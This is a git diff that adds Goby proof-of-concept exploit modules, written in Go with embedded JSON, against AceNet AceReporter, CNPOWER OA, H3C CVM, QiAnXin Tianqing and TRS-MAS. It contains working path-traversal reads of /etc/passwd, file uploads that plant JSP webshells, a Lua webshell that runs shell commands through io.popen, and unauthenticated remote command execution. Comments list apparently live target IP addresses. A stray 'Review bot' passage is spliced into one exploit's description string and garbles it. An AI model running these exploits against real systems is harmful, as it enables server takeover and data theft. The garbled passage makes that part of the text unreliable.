diff --git a/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt b/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt new file mode 100644 index 000000000..7e9cb3150 --- /dev/null +++ b/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt @@ -0,0 +1,136 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "AceNet AceReporter Report component Arbitrary file download", + "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files", + "Product": "AceNet AceReporter Report component", + "Homepage": "", + "DisclosureDate": "2021-08-04", + "Author": "luckying1314@139.com", + "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"", + "Level": "2", + "Impact": "

The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..\\ or../) to download or read a file beyond the original specified path.The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.

", + "Recommandation": "

Limit ../ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file

", + "References": [ + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "path", + "type": "createSelect", + "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "root", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "daemon", + "bz": "" + } + ] + }, + "SetVariable": [] + }, + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "127.0.0.1", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "SetVariable": [ + "output|lastbody" + ] + } + ], + "Tags": [ + "file download" + ], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + 
goutils.GetFileName(), + expJson, + nil, + nil, + )) +} diff --git a/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt b/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt new file mode 100644 index 000000000..7263c2f82 --- /dev/null +++ b/lib/goby/goby_pocs/CNPOWER OA Arbitrary File Upload Vulnerability.txt @@ -0,0 +1,251 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "regexp" + "strings" +) + +func init() { + expJson := `{ + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability", + "Description": "
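Review bot: The key holding this entry's remediation text is misspelled `"Recommandation"`, while every other PoC in this commit uses `"Recommendation"`, so the mitigation guidance will not be surfaced under the key the loader reads for the rest of the corpus; rename it to `"Recommendation": "`. The entry is also tagged `"Level": "2"` with `"CVSSScore": "0.0"`, which reads as unscored rather than low-severity; fill in the score from the CNVD reference or leave it out. Separately, the `Impact` and recommendation strings carry raw line breaks inside a JSON string literal; `encoding/json` rejects unescaped control characters in strings, so unless Goby's loader is lenient these entries will not parse — the same pattern appears in every multi-line `Description`/`Impact`/`Recommendation` in this commit, so confirm against the loader or escape the breaks as `\n`.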

Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Product": "CNPOWER-OA", + "Homepage": "http://www.oa8000.com/", + "DisclosureDate": "2022-07-22", + "Author": "toto", + "FofaQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"", + "GobyQuery": "body=\"/OAapp/WebObjects/OAapp.woa\" || body=\"/OAapp/htpages/app\"", + "Level": "2", + "Impact": "

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:

http://www.oa8000.com/

", + "References": [ + "http://www.oa8000.com" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "fileContent", + "type": "input", + "value": "<%out.println(\"123\");%>", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "OR", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "File Upload" + ], + "VulType": [ + "File Upload" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.8", + "Translation": { + "CN": { + "Name": "华天动力 OA 任意文件上传漏洞", + "Product": "华天动力-OA", + "Description": "

华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。

华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "Recommendation": "

目前官方尚未发布安全补丁,请关注厂商更新。http://www.oa8000.com/

", + "Impact": "

华天动力 OA 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "VulType": [ + "⽂件上传" + ], + "Tags": [ + "⽂件上传" + ] + }, + "EN": { + "Name": "CNPOWER OA Arbitrary File Upload Vulnerability", + "Product": "CNPOWER-OA", + "Description": "

Huatian power collaborative office system combines advanced management ideas, management modes, software technology and network technology to provide users with a low-cost and efficient collaborative office and management platform. Wise managers have achieved good results in strengthening standardized workflow, strengthening team execution, promoting fine management and promoting business growth through the use of Huatian power collaborative office platform.

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

The manufacturer has not provided a vulnerability repair plan. Please pay attention to the update of the manufacturer's homepage:

http://www.oa8000.com/

", + "Impact": "

There is an arbitrary file upload vulnerability in Huatian power OA. Attackers can upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "VulType": [ + "File Upload" + ], + "Tags": [ + "File Upload" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + getOAFilePath98234u293 := func(host *httpclient.FixUrl) string { + requestConfig := httpclient.NewPostRequestConfig("/OAapp/jsp/upload.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundary5Ur8laykKAWws2QO") + requestConfig.Data = "------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"file\"; filename=\"xxx.xml\"\r\nContent-Type: image/png\r\n\r\nreal path\r\n------WebKitFormBoundary5Ur8laykKAWws2QO\r\nContent-Disposition: form-data; name=\"filename\"\r\n\r\nxxx.png\r\n------WebKitFormBoundary5Ur8laykKAWws2QO--\r\n" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, ".dat") { + if path := regexp.MustCompile(`(.*?)Tomcat/webapps/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 { + // 直接返回文件最后一个 jsessionid + return path[1] + } else if path := regexp.MustCompile(`(.*?)htoadata/appdata/.*?\.dat`).FindStringSubmatch(resp.RawBody); len(path) > 1 { + return path[1] + } + } + } + + return "" + } + + exploitUploadFile837276342783 := func(path string, fileContent string, host *httpclient.FixUrl) bool { + + requestConfig := httpclient.NewPostRequestConfig("/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm") + requestConfig.Data = "------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n" + fileContent + 
"\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\n" + path + "Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--\r\n" + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 + } + + return false + } + + checkUploadedFile2398764278 := func(fileContent string, host *httpclient.FixUrl) bool { + requestConfig := httpclient.NewGetRequestConfig("/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, fileContent) + } + + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + path := getOAFilePath98234u293(u) + if path == "" { + path = "D:/htoa/" + } + + rand := goutils.RandomHexString(6) + + if exploitUploadFile837276342783(path, "<%out.print(\""+rand+"\");%>", u) { + return checkUploadedFile2398764278(rand, u) + + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + fileContent := ss.Params["fileContent"].(string) + + path := getOAFilePath98234u293(expResult.HostInfo) + if path == "" { + path = "D:/htoa/" + } + + if exploitUploadFile837276342783(path, fileContent, expResult.HostInfo) { + expResult.Success = true + expResult.Output = "文件已上传,请访问:/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp" + } + + return expResult + }, + )) +} + +// http://36.133.113.253:8081 +// http://221.229.120.251:800/ +// http://winnertoke.com:6001/ \ No newline at end of file 
diff --git a/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt b/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt new file mode 100644 index 000000000..968e04479 --- /dev/null +++ b/lib/goby/goby_pocs/H3C CVM Arbitrary File Upload Vulnerability.txt @@ -0,0 +1,232 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "H3C CVM Arbitrary File Upload Vulnerability", + "Description": "

H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Product": "H3C-CVM", + "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/", + "DisclosureDate": "2022-05-25", + "Author": "su18@javaweb.org", + "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", + "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", + "Level": "3", + "Impact": "

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

At present, the official has not released a security patch, please pay attention to the manufacturer's update.http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "References": [ + "https://fofa.so/" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "fileName", + "type": "input", + "value": "evil", + "show": "" + }, + { + "name": "fileContent", + "type": "input", + "value": "<%out.println(\"123\");%>", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Arbitrary File Creation" + ], + "VulType": [ + "Arbitrary File Creation" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "8.0", + "Translation": { + "CN": { + "Name": "H3C CVM 前台任意文件上传漏洞", + "Product": "H3C-CVM", + "Description": "

H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。

H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "Recommendation": "

目前官方尚未发布安全补丁,请关注厂商更新。http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "Impact": "

H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。

", + "VulType": [ + "⽂件上传" + ], + "Tags": [ + "⽂件上传" + ] + }, + "EN": { + "Name": "H3C CVM Arbitrary File Upload Vulnerability", + "Product": "H3C-CVM", + "Description": "

H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "Recommendation": "

At present, the official has not released a security patch, please pay attention to the manufacturer's update.http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/

", + "Impact": "

H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.

", + "VulType": [ + "Arbitrary File Creation" + ], + "Tags": [ + "Arbitrary File Creation" + ] + } + }, + "AttackSurfaces": { + "Application": null, + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + + // 上传文件 + requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222") + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + requestConfig.Header.Store("Content-range", "bytes 0-10/20") + requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login") + requestConfig.Data = fileContent + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") { + return true + } + } + + return false + } + + checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { + + requestConfig := httpclient.NewGetRequestConfig("/" + fileName) + requestConfig.VerifyTls = false + requestConfig.FollowRedirect = false + + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { + return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) + } + + return false + } + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + + rand := goutils.RandomHexString(6) + rand2 := goutils.RandomHexString(6) + + if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) { + return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u) + } + + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + + fileContent := 
ss.Params["fileContent"].(string) + fileName := ss.Params["fileName"].(string) + + if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) { + + expResult.Success = true + expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp" + } + + return expResult + }, + )) +} + +// http://183.63.173.141:8080/ +// https://60.190.202.42:8443/ +// http://61.53.232.5:28080/ \ No newline at end of file diff --git a/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt b/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt new file mode 100644 index 000000000..4298eeb9d --- /dev/null +++ b/lib/goby/goby_pocs/QiAnXin_Tianqing_terminal_security_management_system_client_upload_file.json_getshell.txt 
@@ -0,0 +1,128 @@ +package exploits + +import ( + "fmt" + "git.gobies.org/goby/goscanner/goutils" + "git.gobies.org/goby/goscanner/jsonvul" + "git.gobies.org/goby/goscanner/scanconfig" + "git.gobies.org/goby/httpclient" + "strings" +) + +func init() { + expJson := `{ + "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell", + "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.", + "Product": "360-TianQing", + "Homepage": "https://www.qianxin.com/product/detail/pid/49", + "DisclosureDate": "2021-04-09", + "Author": "itardc@163.com", + "FofaQuery": "app=\"360-TianQing\"", + "GobyQuery": "app=\"360-TianQing\"", + "Level": "3", + "Impact": "", + "Recommendation": "", + "References": [ + "http://fofa.so" + ], + "HasExp": true, + "ExpParams": [ + { + "name": "cmd", + "type": "input", + "value": "whoami" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "data": "", + "data_type": "text", + "follow_redirect": true, + "method": "GET", + "uri": "/" + }, + "ResponseTest": { + "checks": [ + { + "bz": "", + "operation": "==", + "type": "item", + "value": "200", + "variable": "$code" + } + ], + "operation": "AND", + "type": "group" + } + } + ], + "ExploitSteps": null, + "Tags": ["getshell"], + "CVEIDs": null, + "CVSSScore": "0.0", + "AttackSurfaces": { + "Application": ["360-TianQing"], + "Support": null, + "Service": null, + "System": null, + "Hardware": null + } +}` + + ExpManager.AddExploit(NewExploit( + goutils.GetFileName(), + expJson, + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { + randomFilename := goutils.RandomHexString(4) + cfg := 
httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename)) + cfg.VerifyTls = false + cfg.FollowRedirect = false + cfg.Header.Store("Referer", u.FixedHostInfo) + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" + cfg.Data += "hello,world\r\n" + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" + if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 { + return strings.Contains(resp.Utf8Html, "\"status\":true") && + strings.Contains(resp.Utf8Html, "upload file success") + } + return false + }, + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { + randomFilename := goutils.RandomHexString(4) + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename)) + //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC") + cfg.VerifyTls = false + cfg.FollowRedirect = false + cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo) + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") + 
cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" + cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n" + cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n" + cfg.Data += "local t = io.popen(cmd)\r\n" + cfg.Data += "local a = t:read(\"*all\")\r\n" + cfg.Data += "ngx.say(a)\r\n" + cfg.Data += "end\r\n" + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" + httpclient.DoHttpRequest(expResult.HostInfo, cfg) + cmd := ss.Params["cmd"].(string) + if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 { + expResult.Success = true + expResult.Output = resp.Utf8Html + } + return expResult + }, + )) +} diff --git a/lib/goby/goby_pocs/README.md b/lib/goby/goby_pocs/README.md new file mode 100644 index 000000000..50f279559 --- /dev/null +++ b/lib/goby/goby_pocs/README.md @@ -0,0 +1,15 @@ +# goby-poc +# 声明 +包含447个自定义goby-poc,是否含有后门和重复自行判断,如果无红队版,可直接poc管理处导入自定义poc即可,共计745个。 +![图片](https://user-images.githubusercontent.com/74171727/185719401-f4782b47-157b-48db-87df-955a65adc487.png) + + +本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。 + +Goby POC 仅仅只供对已授权的目标使用测试,对未授权目标的测试,本库不承担责任,均由使用者自行承担。 + + +## ✦✦Star上升曲线✦✦ + +[![Stargazers over time](https://starchart.cc/MY0723/goby-poc.svg)](https://starchart.cc/MY0723/goby-poc) + diff --git a/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt b/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt new file mode 100644 index 000000000..4f06f27c2 --- /dev/null +++ b/lib/goby/goby_pocs/TRS-MAS testCommandExecutor.jsp Remote Command Execution.txt 
@@ -0,0 +1,164 @@ +package exploits + +import ( + "git.gobies.org/goby/goscanner/goutils" +) + +func init() { + expJson := `{ + "Name": "TRS-MAS testCommandExecutor.jsp Remote Command Execution", + "Description": "

TRS MAS is a set of universal media asset management system launched by Beijing Tors Information Technology Co., Ltd. based on the characteristics of audio and video use in the mobile Internet era. The same audio and video resources can be used for different terminal platforms, effectively saving costs. , to simplify the operation. 

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Product": "TRS-MAS", + "Homepage": "http://www.trs.com.cn/", + "DisclosureDate": "2022-04-28", + "Author": "liubye", + "FofaQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"", + "GobyQuery": "header=\"X-Mas-Server\" || banner=\"X-Mas-Server\"", + "Level": "3", + "Impact": "

There is an unauthorized command execution vulnerability in TRS MAS v5 and v6, which can execute arbitrary commands.

", + "Recommendation": "

At present, the version affected by the vulnerability has been officially stopped updating. It is recommended to use defense devices for protection.Disable /sysinfo/testCommandExecutor.jsp path access.

", + "References": [ + "https://cn-sec.com/archives/966820.html" + ], + "Is0day": false, + "HasExp": true, + "ExpParams": [ + { + "name": "cmdLine", + "type": "input", + "value": "whoami", + "show": "" + } + ], + "ExpTips": { + "Type": "", + "Content": "" + }, + "ScanSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/mas/sysinfo/testCommandExecutor.jsp", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "测试命令行进程执行", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=", + "follow_redirect": true, + "header": {}, + "data_type": "text", + "data": "" + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "测试命令行进程执行", + "bz": "" + } + ] + }, + "SetVariable": [] + } + ], + "Tags": [ + "Command Execution" + ], + "VulType": [ + "Command Execution" + ], + "CVEIDs": [ + "" + ], + "CNNVD": [ + "" + ], + "CNVD": [ + "" + ], + "CVSSScore": "9.7", + "Translation": { + "CN": { + "Name": "TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行", + "Product": "拓尔思-MAS", + "Description": "

TRS MAS是基于移动互联网时代音视频的使用特点,北京拓尔思信息技术股份有限公司推出的一套通用型媒资管理系统,同一个音视频资源能面向不同的终端平台提供使用,有效节省成本,简化操作。

TRS MAS v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。

", + "Recommendation": "

目前受漏洞影响的版本官方已停止更新,建议使用防御设备进行防护,禁止对 /sysinfo/testCommandExecutor.jsp 路径的访问。

", + "Impact": "

TRS MAS v5、v6版本存在未授权命令执行漏洞,攻击者可以在未授权情况下在服务器上执行任意命令,获取服务器操作权限。

